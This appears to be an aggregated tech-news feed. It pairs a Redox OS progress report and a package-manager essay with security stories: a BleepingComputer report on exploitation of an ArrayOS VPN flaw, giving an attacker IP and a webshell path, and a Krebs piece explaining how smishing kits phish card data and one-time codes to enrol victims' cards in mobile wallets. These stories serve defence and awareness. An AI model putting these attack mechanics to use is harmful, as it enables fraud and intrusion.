Jeremy Soller successfully ported the Smallvil Wayland compositor example from the Smithay framework and GTK3 Wayland to Redox. Special thanks to Ibuki Omatsu (Unix Domain Socket implementation and bug fixing), Wildan Mubarok (bug fixing and implementation of missing functions), and other contributors for making it possible. Smallvil performance on Redox is not adequate, so we still have work to do on Wayland support, but this represents a huge step forward.

  • GTK3 Wayland Demo running on Smallvil compositor

WebKitGTK on Redox!

Jeremy Soller and Wildan Mubarok successfully ported and fixed WebKitGTK (GTK 3.x frontend) and its web browser example on Redox. Thanks again to the other contributors who helped us achieve this.

This is the first full-featured browser engine ported to Redox, allowing most websites to work.

MATE Desktop on Redox!

While porting MATE Marco to get a better X11 window manager, Jeremy Soller decided to port a basic MATE desktop as well.

More Boot Fixes

Jeremy Soller added and fixed many driver timeouts to block more infinite-loop bugs and let booting continue. He also updated system components and drivers to daemonize after starting, and moved hardware initialization into their child processes to fix hangs and allow booting to continue on more hardware.

If you have a computer that hangs on Redox boot we recommend that you test again with the latest daily image.

Migration to i586

The Rust upstream migrated the i686 CPU targets to i586. The Redox build system and documentation have been updated to use i586 as the CPU architecture target name for 32-bit x86 computers.

Jeremy Soller and Wildan Mubarok implemented a feature that allows recipes to declare which build tools they need, with those build tools themselves available as recipes. This brings the following benefits:

  • Simplifies the Redox build system, so applications, libraries, and build tools use the same build environment and packaging system
  • Greatly reduces build system configuration time in both Podman and Native builds, as developers will only install the build tools for the recipes that they are using
  • Removes the maintenance effort of updating the list of build tool packages required for each Unix-like platform whenever a build tool package is added for the Native Build
  • Eases relibc testing on Linux
  • Allows the future implementation of full source bootstrapping to avoid compiler backdoors, like Guix

Build System Submodule Removal

Jeremy Soller unified the build system repositories, merging the submodules into the main build system repository . This will help to simplify build system improvements, keep everything synchronized, and allow faster development and testing.

If you haven’t updated your build system yet, you should back up your changes, and either run the make distclean pull container_clean all command, or download a new build system copy ( git clone https://gitlab.redox-os.org/redox-os/redox.git ) and build from scratch.

More GitLab Protection

After suffering frequent GitLab slowdowns, we discovered that bots were using our CI for cryptomining (again) and that AI scrapers were consuming server resources, making the site very slow. As a consequence, we increased our protection, which changed some things:

  • By default, only maintainers can run CI jobs. If you are working on solving CI problems, let us know and we can discuss temporary access to CI.
  • Git code push using SSH has been disabled until we find a way to fix it. All contributors will need to use HTTPS with a PAT (Personal Access Token) for git push usage.

The book has been updated with instructions on how to configure your PAT .

Kernel Improvements

  • (kernel) 4lDO2 fixed a memory allocator panic and data corruption bug
  • (kernel) Jeremy Soller enabled serial interrupts in ARM64 ACPI
  • (kernel) Jeremy Soller implemented nested event queues
  • (kernel) Jeremy Soller implemented kfpath in some schemes
  • (kernel) Jeremy Soller implemented F_DUPFD_CLOEXEC
  • (kernel) Jeremy Soller improved the futex lockup performance
  • (kernel) Jeremy Soller improved CPU stat accuracy
  • (kernel) Jeremy Soller improved the i586 CPU stats
  • (kernel) Jeremy Soller fixed an event queue race condition with pipes
  • (kernel) Jeremy Soller reduced warnings for legacy scheme path on GUI applications
  • (kernel) Anhad Singh fixed some deadlocks
  • (kernel) bjorn3 did some code cleanups
  • (kernel) AArch Angel implemented kfpath on DTB scheme

Driver Improvements

  • (drivers) Jeremy Soller fixed missing PCI devices in Intel Arrow Lake computers
  • (drivers) Jeremy Soller improved the PS/2 driver stability
  • (drivers) Jeremy Soller improved the Intel HD Audio driver error handling
  • (drivers) Jeremy Soller implemented unaligned access on the PCI driver
  • (drivers) Ibuki Omatsu updated the alxd , ihdad , ac97d , and sb16d drivers to use the redox-scheme library, which makes them up-to-date
  • (drivers) bjorn3 unified the interrupt vector handling code between the Intel HD Audio and Realtek ethernet drivers
  • (drivers) bjorn3 merged the drivers repository into the base repository. It will allow faster development and testing, especially for driver initialization, and simplify configuration.

System Improvements

  • (sys) Jeremy Soller improved log verbosity on system bootstrap
  • (sys) Jeremy Soller implemented support for MSG_DONTWAIT in Unix Domain Sockets
  • (sys) Jeremy Soller implemented SO_PEERCRED in Unix streams
  • (sys) Jeremy Soller implemented the fpath() function in the proc scheme
  • (sys) Jeremy Soller implemented the fstat() function in the IPC daemon
  • (sys) Jeremy Soller did a refactor of fevent() function handling
  • (sys) Jeremy Soller fixed SO_SNDBUF in IPC daemon
  • (sys) Jeremy Soller replaced the Smith text editor with Kibi in the minimal variants
  • (sys) bjorn3 reduced the uutils compilation time by a third (2m50s to 1m56s on his computer) by using ThinLTO instead of FatLTO
  • (sys) bjorn3 fixed some code warnings

Relibc Improvements

  • (libc) 4lDO2 implemented a macro to verify if the relibc internal definitions match the Rust libc crate definitions
  • (libc) Jeremy Soller implemented the sys/queue.h function group
  • (libc) Jeremy Soller improved the TLS alignment reliability
  • (libc) Jeremy Soller improved the safety of programs that close file descriptors in a range
  • (libc) Jeremy Soller implemented the ppoll() function
  • (libc) Jeremy Soller fixed a possible POSIX thread key collision
  • (libc) Jeremy Soller fixed the ai_addrlen and socklen_t type definitions
  • (libc) Josh Megnauth implemented the posix_fallocate() function
  • (libc) Ibuki Omatsu fixed the getpeername() function in Unix Streams
  • (libc) Wildan Mubarok fixed the getsubopt() function
  • (libc) auronandace improved the documentation of some POSIX functions

Networking Improvements

  • (net) Wildan Mubarok improved the network stack error handling

RedoxFS Improvements

  • (redoxfs) Jeremy Soller updated the fpath() function to use the new scheme format
  • (redoxfs) Jeremy Soller fixed a panic due to inline data overflow

Orbital Improvements

  • (gui) bjorn3 did some code refactorings
  • (gui) Wildan Mubarok fixed the orbclient example
  • (gui) Wildan Mubarok optimized the orbclient library gradient calculation

Programs

  • (programs) Jeremy Soller updated the Rust recipe version to match the Redox cross-compiler on Linux
  • (programs) Jeremy Soller enabled DRI3 on Mesa3D and X11
  • (programs) Jeremy Soller updated GnuTLS to use dynamic linking
  • (programs) Jeremy Soller fixed the Luanti and librsvg compilation
  • (programs) Wildan Mubarok ported the EGL code from Mesa3D
  • (programs) Wildan Mubarok fixed OpenLara and Rustual Boy compilation
  • (programs) Anhad Singh fixed the Fish shell execution

Packaging Improvements

  • (pkg) Wildan Mubarok started to implement recipe features which will allow more flexibility with software options
  • (pkg) Wildan Mubarok implemented recursive recipe dependencies which will allow us to use implicit dependencies (remove duplicated dependencies) and reduce maintenance cost
  • (pkg) Wildan Mubarok implemented package size and BLAKE3 hash on package information, which allow accurate download progress bar and package update verification
  • (pkg) Wildan Mubarok fixed the package manager not detecting installed packages from the build system

Debugging Improvements

  • (debug) Jeremy Soller implemented the support for userspace stack traces
  • (debug) Jeremy Soller reduced unnecessary logging on system components and drivers to ease boot problem reporting

Build System Improvements

  • (build) Wildan Mubarok implemented an option (the FSTOOLS_IN_PODMAN environment variable) to build and run the filesystem tools in the Podman container, which fixes a problem with FUSE on macOS, NixOS, and GuixSD
  • (build) Wildan Mubarok updated the Cargo recipe template to use dynamic linking
  • (build) Wildan Mubarok improved REPO_BINARY option to cache downloaded packages between image rebuilds
  • (build) Wildan Mubarok updated Cookbook unfetch to also clean recipe binaries, removing the need to use the uc.recipe recipe target
  • (build) Wildan Mubarok did a code simplification in Cookbook which reduced dependencies
  • (build) Wildan Mubarok did a code simplification in the installer which reduced most dependencies
  • (build) Wildan Mubarok fixed some breaking changes after the Rust implementation of Cookbook
  • (build) Wildan Mubarok fixed the Nix flake (not tested on NixOS, only the package manager on Debian)
  • (build) Wildan Mubarok fixed the MacOS support on Apple Silicon
  • (build) Wildan Mubarok configured the Berkeley university mirror as the default GNU FTP mirror, to fix the occasionally very slow downloads of source tarballs
  • (build) Ribbon fixed missing ARM64 and RISC-V emulators and reduced the QEMU installation time and size by only installing the emulators for the CPU architectures supported by Redox

Redoxer Improvements

  • (redoxer) Wildan Mubarok implemented a way to build and run tests from C/C++ programs
  • (redoxer) Wildan Mubarok fixed the toolchain downloading for Linux ARM64 distributions
  • (redoxer) Wildan Mubarok did a code simplification in Redoxer which reduced dependencies by half

Documentation Improvements

  • (doc) Ribbon updated and improved the Coding and Building page, now it has fully up-to-date information
  • (doc) Ribbon updated and improved some book pages to use the new recipe push feature to save development time
  • (doc) Ribbon documented the REPO_OFFLINE (offline mode) environment variable
  • (doc) Ribbon documented the make cook (Build the filesystem enabled recipes), make push (only install recipe packages with changes in an existing QEMU image), make tree (show the filesystem configuration recipes and recipe dependencies tree ), make find (show recipe packages location), and make mount_live (mount the live disk ISO) commands
  • (doc) Ribbon documented the make x.--all (run a recipe option in all recipes) and make x.--category-category-name (run a recipe option in a recipe category folder) commands
  • (doc) Ribbon documented the source.shallow_clone data type (to enable Git shallow clone in recipes)
  • (doc) Ribbon moved the Cookbook package policy to the Application Porting page and improved the recipe TODO suggestions
  • (doc) Ribbon updated and fixed the Build Process page
  • (doc) Ribbon updated how to contribute using the GitLab web interface
  • (doc) Ribbon explained how to write book documentation and improved how to review MRs in the Developer FAQ
  • (doc) Ribbon documented how to create diagrams for Hugo in the Developer FAQ
  • (doc) Wildan Mubarok expanded and improved the Important Programs and Our Goals pages
  • (doc) Wildan Mubarok improved the pre-i586 CPU support information with more details
  • (doc) Wildan Mubarok updated and improved the Configuration Settings page with new options
  • (doc) Wildan Mubarok documented the new/better method to prevent breakage of local recipe changes
  • (doc) Wildan Mubarok documented the Cookbook offline mode
  • (doc) Wildan Mubarok documented the Cookbook configuration
  • (doc) Wildan Mubarok documented the CI (disable parallel recipe fetch/build and Cookbook TUI), COOKBOOK_MAKE_JOBS (set the number of CPU threads for recipe compilation), COOKBOOK_VERBOSE (enable more recipe log information) and COOKBOOK_LOGS (option to save recipe logs at build/logs/$TARGET ) environment variables
  • (doc) Wildan Mubarok moved the Cookbook recipe tarball mirror documentation to the “Configuration Settings” page
  • (doc) Timmy Douglas documented how to build Redox on GuixSD
  • (doc) Jonathan McCormick applied alphabetical order in the hardware compatibility tables and improved grammar

Hardware Updates

  • (hw) Jonathan McCormick tested Lenovo ThinkCentre M83 and reported the “Broken” status using an image from 2025-11-09

Website Improvements

How To Test The Changes

To test the changes of this month download the server or desktop variants of the daily images .

Use the desktop variant for a graphical interface. If you prefer a terminal-style interface, or if the desktop variant doesn’t work, please try the server variant.

  • If you want to test in a virtual machine use the “harddrive” images
  • If you want to test on real hardware use the “livedisk” images

Read the following pages to learn how to use the images in a virtual machine or real hardware:

Sometimes the daily images are outdated and you need to build Redox from source. For instructions on how to do this, read the Building Redox page.

Join us on Matrix Chat

If you want to contribute, give feedback or just listen in to the conversation, join us on Matrix Chat .

Coca Cola has an executive dedicated to McDonald's

Hacker News
www.coca-colacompany.com
2025-12-04 23:12:33
Comments...
Original Article

President, The McDonald’s Division

Roberto Mercade is president of The McDonald’s Division (TMD) of The Coca‑Cola Company. He leads a global organization that is responsible for the company’s key relationship with McDonald's in more than 100 markets.

Mercade has been with Coca‑Cola since 1992, when he began his career as a production services manager in Puerto Rico. He went on to hold a number of roles before being named general manager of the Venezuela & Caribbean franchise unit in 2006.

In 2011, he became general manager in South Africa. In 2014, Mercade moved to Australia to lead the South Pacific business unit.

He returned to Latin America in 2018 as president of the Latin Center business unit. In 2021, he became the Mexico zone president.

Mercade holds a degree in industrial engineering from the Georgia Institute of Technology.

We gave 5 LLMs $100K to trade stocks for 8 months

Hacker News
www.aitradearena.com
2025-12-04 23:08:25
Comments...

Hackers are exploiting ArrayOS AG VPN flaw to plant webshells

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 23:05:05
Threat actors have been exploiting a command injection vulnerability in Array AG Series VPN devices to plant webshells and create rogue users. [...]...
Original Article

Hackers are exploiting ArrayOS AG VPN flaw to plant webshells

Threat actors have been exploiting a command injection vulnerability in Array AG Series VPN devices to plant webshells and create rogue users.

Array Networks fixed the vulnerability in a May security update but has not assigned it an identifier, complicating efforts to track the flaw and manage patching.

An advisory from the Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) warns that hackers have been exploiting the vulnerability since at least August in attacks targeting organizations in the country.

The agency reports that the attacks originate from the IP address 194.233.100[.]138, which is also used for communications.

“In the incidents confirmed by JPCERT/CC, a command was executed attempting to place a PHP webshell file in the path /ca/aproxy/webapp/,” reads the bulletin (machine translated).

The flaw impacts ArrayOS AG 9.4.5.8 and earlier versions, including AG Series hardware and virtual appliances with the ‘DesktopDirect’ remote access feature enabled.

JPCERT says that ArrayOS version 9.4.5.9 addresses the problem and provides the following workarounds if updating is not possible:

  1. If the DesktopDirect feature is not in use, disable all DesktopDirect services
  2. Use URL filtering to block access to URLs containing a semicolon

Array Networks AG Series is a line of secure access gateways that rely on SSL VPNs to create encrypted tunnels for secure remote access to corporate networks, applications, desktops, and cloud resources.

Typically, they are used by large organizations and enterprises that need to facilitate remote or mobile work.

Macnica security researcher Yutaka Sejiyama reported on X that his scans returned 1,831 Array AG instances worldwide, primarily in China, Japan, and the United States.

The researcher verified that at least 11 hosts have the DesktopDirect feature enabled, but cautioned that the real number of hosts with DesktopDirect active is likely significantly higher.


“Because this product’s user base is concentrated in Asia and most of the observed attacks are in Japan, security vendors and security organizations outside Japan have not been paying close attention,” Sejiyama told BleepingComputer.

BleepingComputer contacted Array Networks to ask whether they plan to publish a CVE-ID and an official advisory for the actively exploited flaw, but a reply was not available by publication time.

Last year, CISA warned about active exploitation targeting CVE-2023-28461 , a critical remote code execution in Array Networks AG and vxAG ArrayOS.


SMS Phishers Pivot to Points, Taxes, Fake Retailers

Krebs
krebsonsecurity.com
2025-12-04 23:02:34
China-based phishing groups blamed for non-stop scam SMS messages about a supposed wayward package or unpaid toll fee are promoting a new offering, just in time for the holiday shopping season: Phishing kits for mass-creating fake but convincing e-commerce websites that convert customer payment card...
Original Article

China-based phishing groups blamed for non-stop scam SMS messages about a supposed wayward package or unpaid toll fee are promoting a new offering, just in time for the holiday shopping season: Phishing kits for mass-creating fake but convincing e-commerce websites that convert customer payment card data into mobile wallets from Apple and Google. Experts say these same phishing groups also are now using SMS lures that promise unclaimed tax refunds and mobile rewards points.

Over the past week, thousands of domain names were registered for scam websites that purport to offer T-Mobile customers the opportunity to claim a large number of rewards points. The phishing domains are being promoted by scam messages sent via Apple’s iMessage service or the functionally equivalent RCS messaging service built into Google phones.

An instant message spoofing T-Mobile says the recipient is eligible to claim thousands of rewards points.

The website scanning service urlscan.io shows thousands of these phishing domains have been deployed in just the past few days alone. The phishing websites will only load if the recipient visits with a mobile device, and they ask for the visitor’s name, address, phone number and payment card data to claim the points.

A phishing website registered this week that spoofs T-Mobile.

If card data is submitted, the site will then prompt the user to share a one-time code sent via SMS by their financial institution. In reality, the bank is sending the code because the fraudsters have just attempted to enroll the victim’s phished card details in a mobile wallet from Apple or Google. If the victim also provides that one-time code, the phishers can then link the victim’s card to a mobile device that they physically control.

Pivoting off these T-Mobile phishing domains in urlscan.io reveals a similar scam targeting AT&T customers:

An SMS phishing or “smishing” website targeting AT&T users.

Ford Merrill works in security research at SecAlliance, a CSIS Security Group company. Merrill said multiple China-based cybercriminal groups that sell phishing-as-a-service platforms have been using the mobile points lure for some time, but the scam has only recently been pointed at consumers in the United States.

“These points redemption schemes have not been very popular in the U.S., but have been in other geographies like EU and Asia for a while now,” Merrill said.

A review of other domains flagged by urlscan.io as tied to this Chinese SMS phishing syndicate shows they are also spoofing U.S. state tax authorities, telling recipients they have an unclaimed tax refund. Again, the goal is to phish the user’s payment card information and one-time code.

A text message that spoofs the District of Columbia’s Office of Tax and Revenue.

CAVEAT EMPTOR

Many SMS phishing or “smishing” domains are quickly flagged by browser makers as malicious. But Merrill said one burgeoning area of growth for these phishing kits — fake e-commerce shops — can be far harder to spot because they do not call attention to themselves by spamming the entire world.

Merrill said the same Chinese phishing kits used to blast out package redelivery message scams are equipped with modules that make it simple to quickly deploy a fleet of fake but convincing e-commerce storefronts. Those phony stores are typically advertised on Google and Facebook, and consumers usually end up at them by searching online for deals on specific products.

A machine-translated screenshot of an ad from a China-based phishing group promoting their fake e-commerce shop templates.

With these fake e-commerce stores, the customer is supplying their payment card and personal information as part of the normal check-out process, which is then punctuated by a request for a one-time code sent by your financial institution. The fake shopping site claims the code is required by the user’s bank to verify the transaction, but it is sent to the user because the scammers immediately attempt to enroll the supplied card data in a mobile wallet.

According to Merrill, it is only during the check-out process that these fake shops will fetch the malicious code that gives them away as fraudulent, which tends to make it difficult to locate these stores simply by mass-scanning the web. Also, most customers who pay for products through these sites don’t realize they’ve been snookered until weeks later when the purchased item fails to arrive.

“The fake e-commerce sites are tough because a lot of them can fly under the radar,” Merrill said. “They can go months without being shut down, they’re hard to discover, and they generally don’t get flagged by safe browsing tools.”

Happily, reporting these SMS phishing lures and websites is one of the fastest ways to get them properly identified and shut down. Raymond Dijkxhoorn is the CEO and a founding member of SURBL, a widely-used blocklist that flags domains and IP addresses known to be used in unsolicited messages, phishing and malware distribution. SURBL has created a website called smishreport.com that asks users to upload a screenshot of any smishing message(s) received.

“If [a domain is] unlisted, we can find and add the new pattern and kill the rest” of the matching domains, Dijkxhoorn said. “Just make a screenshot and upload. The tool does the rest.”

The SMS phishing reporting site smishreport.com.

Merrill said the last few weeks of the calendar year typically see a big uptick in smishing — particularly package redelivery schemes that spoof the U.S. Postal Service or commercial shipping companies.

“Every holiday season there is an explosion in smishing activity,” he said. “Everyone is in a bigger hurry, frantically shopping online, paying less attention than they should, and they’re just in a better mindset to get phished.”

SHOP ONLINE LIKE A SECURITY PRO

As we can see, adopting a shopping strategy of simply buying from the online merchant with the lowest advertised prices can be a bit like playing Russian Roulette with your wallet. Even people who shop mainly at big-name online stores can get scammed if they’re not wary of too-good-to-be-true offers (think third-party sellers on these platforms).

If you don’t know much about the online merchant that has the item you wish to buy, take a few minutes to investigate its reputation. If you’re buying from an online store that is brand new, the risk that you will get scammed increases significantly. How do you know how long the site selling that must-have gadget at the lowest price has been around? One easy way to get a quick idea is to run a basic WHOIS search on the site’s domain name. The more recent the site’s “created” date, the more likely it is a phantom store.
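
As a rough illustration, here is a minimal Python sketch of that check, shelling out to the standard whois command-line client; registry field labels vary widely, so treat the result as a heuristic rather than a verdict:

import subprocess

def domain_created(domain: str) -> str | None:
    # Run the system `whois` client and return the first line that
    # looks like a creation date, if any.
    result = subprocess.run(
        ["whois", domain], capture_output=True, text=True, timeout=30
    )
    for line in result.stdout.splitlines():
        # Common registry labels: "Creation Date:", "created:", "Registered on:"
        if line.strip().lower().startswith(("creation date", "created", "registered on")):
            return line.strip()
    return None

print(domain_created("example.com"))  # e.g. "Creation Date: 1995-08-14T04:00:00Z"

A domain created within the past few weeks that is already selling deeply discounted goods deserves extra suspicion.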

If you receive a message warning about a problem with an order or shipment, visit the e-commerce or shipping site directly, and avoid clicking on links or attachments — particularly missives that warn of some dire consequences unless you act quickly. Phishers and malware purveyors typically seize upon some kind of emergency to create a false alarm that often causes recipients to temporarily let their guard down.

But it’s not just outright scammers who can trip up your holiday shopping: oftentimes, items that are advertised at steeper discounts than at other online stores make up for it by charging far more than normal for shipping and handling.

So be careful what you agree to: Check to make sure you know how long the item will take to be shipped, and that you understand the store’s return policies. Also, keep an eye out for hidden surcharges, and be wary of blithely clicking “ok” during the checkout process.

Most importantly, keep a close eye on your monthly statements. If I were a fraudster, I’d most definitely wait until the holidays to cram through a bunch of unauthorized charges on stolen cards, so that the bogus purchases would get buried amid a flurry of other legitimate transactions. That’s why it’s key to closely review your credit card bill and to quickly dispute any charges you didn’t authorize.

StardustOS: Library operating system for building light-weight Unikernels

Hacker News
github.com
2025-12-04 22:56:08
Comments...
Original Article

alt text

What is Stardust?

Stardust is a unikernel operating system designed to run Cloud applications in a protected, single-address space environment. It delegates the management of physical resources to an underlying hypervisor which is treated as a trusted platform. Stardust has a small code base that can be maintained easily, and relies on static linking to combine a minimal kernel with a single application, along with the libraries and associated programming language run-time required for the execution of the application. Due to static linking, an executable binary of Stardust is packaged within an immutable single-purpose virtual machine image. Stardust supports multiple cores, preemptive threads, and basic block and networking drivers, and provides a collection of standard POSIX-compatible libraries.

Stardust is being used in supporting the teaching and research activities at the University of St Andrews.

Projects

  • Stardust provides the unikernel implementation in C.
  • Stardust-oxide is a re-implementation of the unikernel in Rust.
  • Duster provides a small debugger for para-virtualised Unikernels written in C that run on the Xen hypervisor.
  • Minimal is a minimal kernel used as a reference implementation to support teaching activities.
  • Packages is a collection of software libraries ported to Stardust for experimentation.

Material

  • Jaradat, W., Dearle, A. and Lewis, J. Unikernel support for the deployment of light-weight, self-contained, and latency avoiding services. In the Third Annual UK System Research Challenges Workshop, United Kingdom, 2018.
  • McKeogh, F., Stardust Oxide, Dissertation, University of St Andrews, United Kingdom.


State of AI: An Empirical 100T Token Study with OpenRouter

Hacker News
openrouter.ai
2025-12-04 22:26:43
Comments...

NCSC's ‘Proactive Notifications’ warns orgs of flaws in exposed devices

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 22:21:12
The UK's National Cyber Security Center (NCSC) announced the testing phase of a new service called Proactive Notifications, designed to inform organizations in the country of vulnerabilities present in their environment. [...]...
Original Article

NCSC's ‘Proactive Notifications’ warns orgs of flaws in exposed devices

The UK's National Cyber Security Center (NCSC) announced the testing phase of a new service called Proactive Notifications, designed to inform organizations in the country of vulnerabilities present in their environment.

The service is delivered through cybersecurity firm Netcraft and is based on publicly available information and internet scanning.

The NCSC will identify organizations that lack essential security services and will contact them with specific software update recommendations that address unpatched vulnerabilities.

This may include recommendations on specific CVEs or general security issues, such as the use of weak encryption.

“Scanning and notifications will be based on external observations such as the version number publicly advertised by the software,” NCSC explains, adding that this activity is “in compliance with the Computer Misuse Act.”

The agency highlights that the emails sent through this service originate from netcraft.com addresses, do not include attachments, and do not request payments, personal details, or other types of information.

BleepingComputer learned that the pilot program will cover UK domains and IP addresses from Autonomous System Numbers (ASNs) in the country.

The service will not cover all systems or vulnerabilities, though, and the recommendation is that entities do not rely on it alone for security alerts.

Organizations are strongly encouraged to sign up for the more mature ‘Early Warning’ service to receive timely notifications for security issues affecting their networks.

Early Warning is a free service from NCSC that alerts on potential cyberattacks, vulnerabilities, or other suspicious activity in a company's network.

It works by aggregating public, private, and government cyber-threat intelligence feeds and cross-referencing them with the domains and IP addresses of enrolled organizations to spot signs of active compromises.

Proactive Notification is triggered before a direct threat or compromise is detected, when NCSC becomes aware of a risk relevant to an organization’s setup.

Together, the two services form a layered security approach: Proactive Notification helps with hardening systems and reducing risk, while Early Warning picks up what still manages to slip through.

The NCSC has not provided a timeline for the Proactive Notifications program exiting the pilot phase and becoming more broadly available.


What is a Package Manager?

Lobsters
nesbitt.io
2025-12-04 22:20:47
Comments...
Original Article

When people think of package managers, they usually picture installing a library, but these days package managers and their associated registries handle dozens of distinct functions.

A package manager is a tool that automates the process of installing, updating, configuring, and removing software packages. In practice, modern language package managers have accumulated responsibilities far beyond this definition.

The client

An installer: downloads a package archive from the registry, extracts it and places it in your language’s load path so your code can import it.

An updater: checks for newer versions of installed packages, downloads them, and replaces the old versions, either one at a time or everything at once.

A dependency resolver: when you install a package, you install its dependencies, and their dependencies, and so on, and the resolver figures out which versions can coexist, which is NP-complete and therefore slow, difficult, and full of trade-offs.
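
To make that concrete, here is a toy backtracking resolver in Python. The package names, versions, and tiny index are invented for illustration; real resolvers add constraint ranges, caching, and conflict-driven heuristics on top of this basic search:

INDEX = {
    # name -> {version: {dependency: allowed versions}}
    "app":  {"1.0": {"web": {"2.0", "2.1"}, "json": {"1.1"}}},
    "web":  {"2.0": {"json": {"1.0"}}, "2.1": {"json": {"1.1"}}},
    "json": {"1.0": {}, "1.1": {}},
}

def resolve(todo, chosen):
    if not todo:
        return chosen
    (name, allowed), rest = todo[0], todo[1:]
    if name in chosen:
        # Already pinned: the pinned version must satisfy this constraint too.
        return resolve(rest, chosen) if chosen[name] in allowed else None
    for version in sorted(allowed, reverse=True):  # prefer newest first
        deps = INDEX[name][version]
        result = resolve(rest + list(deps.items()), {**chosen, name: version})
        if result is not None:
            return result
    return None  # no version works: backtrack

print(resolve([("app", {"1.0"})], {}))
# -> {'app': '1.0', 'web': '2.1', 'json': '1.1'}
# Had web 2.0 been picked, its json 1.0 requirement would conflict with
# app's json 1.1 constraint, forcing the resolver to backtrack.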

A local cache: stores downloaded packages on disk so subsequent installs don’t hit the network, enabling offline installs and faster builds while raising questions about cache invalidation when packages change.

A command runner: executes a package’s CLI tool without permanently installing it by downloading the package, running the command, and cleaning up, which is useful for one-off tasks or trying tools without committing to them.

A script executor: runs scripts defined in your manifest file, whether build, test, lint, deploy, or any custom command, providing a standard way to invoke project tasks without knowing the underlying tools.

Project definition

A manifest format: a file that declares your project’s dependencies with version constraints, plus metadata like name, version, description, author, license, repository URL, keywords, and entry points, serving as the source of truth for what your project needs.

A lockfile format: records the exact versions of every direct and transitive dependency that were resolved, often with checksums to verify integrity, ensuring everyone working on the project gets identical dependencies.

Dependency types: distinguishes between runtime dependencies, development dependencies, peer dependencies, and optional dependencies, each with different semantics for when they get installed and who’s responsible for providing them.

Overrides and resolutions: lets you force specific versions of transitive dependencies when the default resolution doesn’t work, useful for patching security issues or working around bugs before upstream fixes them.

Workspaces: manages multiple packages in a single repository, sharing dependencies and tooling across a monorepo while still publishing each package independently.

The registry

An index: lists all published versions of a package with release dates and metadata, letting you pick a specific version or see what’s available, and is the baseline data most tooling relies on.

A publishing platform: packages your code into an archive, uploads it to the registry, and makes it available for anyone to install, handling versioning, metadata validation, and release management.

A namespace: every package needs a unique name, and most registries use flat namespaces where names are globally unique and first-come-first-served, making short names scarce and valuable, though some support scoped names for organizations or use reverse domain notation to avoid conflicts.

A search engine: the registry website lets you find packages by name, keyword, or category, with results sorted by downloads, recent activity, or relevance, and is often the first place developers go when looking for a library.

A documentation host: renders READMEs on package pages, displays changelogs, and sometimes generates API documentation from source code, with some registries hosting full documentation sites separate from the package listing.

A download counter: tracks how often each package and version gets downloaded, helping developers gauge popularity, identify abandoned projects, and make decisions about which libraries to trust.

A dependency graph API: exposes the full tree of what depends on what, both for individual packages and across the entire registry, which security tools use to trace vulnerability impact and researchers use to study ecosystem structure.

A CDN: distributes package downloads across edge servers worldwide, and since a popular registry handles billions of requests per week, caching, geographic distribution, and redundancy matter because outages affect millions of builds.

A binary host: stores and serves precompiled binaries for packages that include native code, with different binaries for different operating systems, architectures, and language versions, saving users from compiling C extensions themselves.

A build farm: some registries compile packages from source on their own infrastructure, producing binaries that users can trust weren’t tampered with on a developer’s laptop and ensuring consistent build environments.

A mirror: organizations run internal copies of registries for reliability, speed, or compliance, since some companies need packages to come from their own infrastructure, and registries provide protocols and tooling to make this work.

A deprecation policy: rules for marking packages as deprecated, transferring ownership of abandoned packages, or removing code entirely, addressing what happens when a maintainer disappears or a package becomes harmful and balancing immutability against the need to fix mistakes.

Security

An authentication system: publishers need accounts to upload packages, so registries handle signup, login, password reset, two-factor authentication, and API tokens with scopes and expiration, since account security directly affects supply chain security.

An access control system: registries determine who can publish or modify which packages through maintainer lists, organization teams, and role-based permissions, with some supporting granular controls like publish-only tokens or requiring multiple maintainers to sign off on releases.

Trusted publishing: some registries allow CI systems to publish packages using short-lived OIDC tokens instead of long-lived secrets, so you don’t have to store credentials in your build environment and compromised tokens expire quickly.

An audit log: registries record who published what package, when, from what IP address, and using what credentials, useful for forensics after a compromise or just understanding how a package evolved.

Integrity verification: registries provide checksums that detect corrupted or tampered downloads independent of signatures, so even without cryptographic verification you know you got what the registry sent.
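
A minimal sketch of what that client-side check might look like, assuming the registry publishes a SHA-256 digest for each archive (the file name and lockfile variable are placeholders):

import hashlib
import hmac

def verify_sha256(path: str, expected_hex: str) -> bool:
    # Hash the downloaded archive in chunks and compare against the
    # digest the registry published.
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return hmac.compare_digest(h.hexdigest(), expected_hex.lower())

# checksum_from_lockfile is a placeholder for wherever the expected digest lives:
# if not verify_sha256("pkg-1.2.3.tar.gz", checksum_from_lockfile):
#     raise RuntimeError("checksum mismatch: refusing to install")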

A signing system: registries support cryptographic signatures that verify who published a package and that it hasn’t been tampered with. Build provenance attestations can prove a package was built from specific source code in a specific environment.

A security advisory database: registries maintain a catalog of known vulnerabilities mapped to affected package versions, so when a CVE is published they track which packages and version ranges are affected and tools can warn users.

A vulnerability scanner: checks your installed dependencies against the advisory database and flags packages with known security issues, often running automatically during install or as a separate audit command.

A malware scanner: registries analyze uploaded packages for malicious code before or after they’re published, where automated static analysis catches obvious patterns but sophisticated attacks often require human review.

A typosquatting detector: registries scan for package names that look like misspellings of popular packages, which attackers register to catch developers who mistype an install command, and try to detect and block them before they cause harm.
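
The crudest form of such a detector is an edit-distance check against popular names. The POPULAR list below is invented, and real systems add keyboard-adjacency and homoglyph signals plus human review; this sketch just shows the core idea:

POPULAR = {"requests", "numpy", "django"}  # illustrative, not a real ranking

def edit_distance(a: str, b: str) -> int:
    # Classic Wagner-Fischer dynamic programming, O(len(a) * len(b)).
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def looks_like_typosquat(name: str) -> str | None:
    for target in POPULAR:
        if name != target and edit_distance(name, target) == 1:
            return target
    return None

print(looks_like_typosquat("reqests"))  # -> "requests" (one dropped letter)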

An SBOM generator: produces software bills of materials listing every component in your dependency tree, used for compliance, auditing, and tracking what’s actually running in production.

A security team: registries employ people who triage vulnerability reports, investigate suspicious packages, coordinate takedowns, and respond to incidents, because automation helps but humans make the judgment calls.

So what is a package manager? It depends how far you zoom out. At the surface, it’s a command that installs libraries. One level down, it’s a dependency resolver and a reproducibility tool. Further still, it’s a publishing platform, a search engine, a security operation, and part of global infrastructure.

And how does all of this get funded and supported on an ongoing basis? Sponsorship programs, foundation grants, corporate backing, or just volunteer labor - it varies widely and often determines what’s possible.

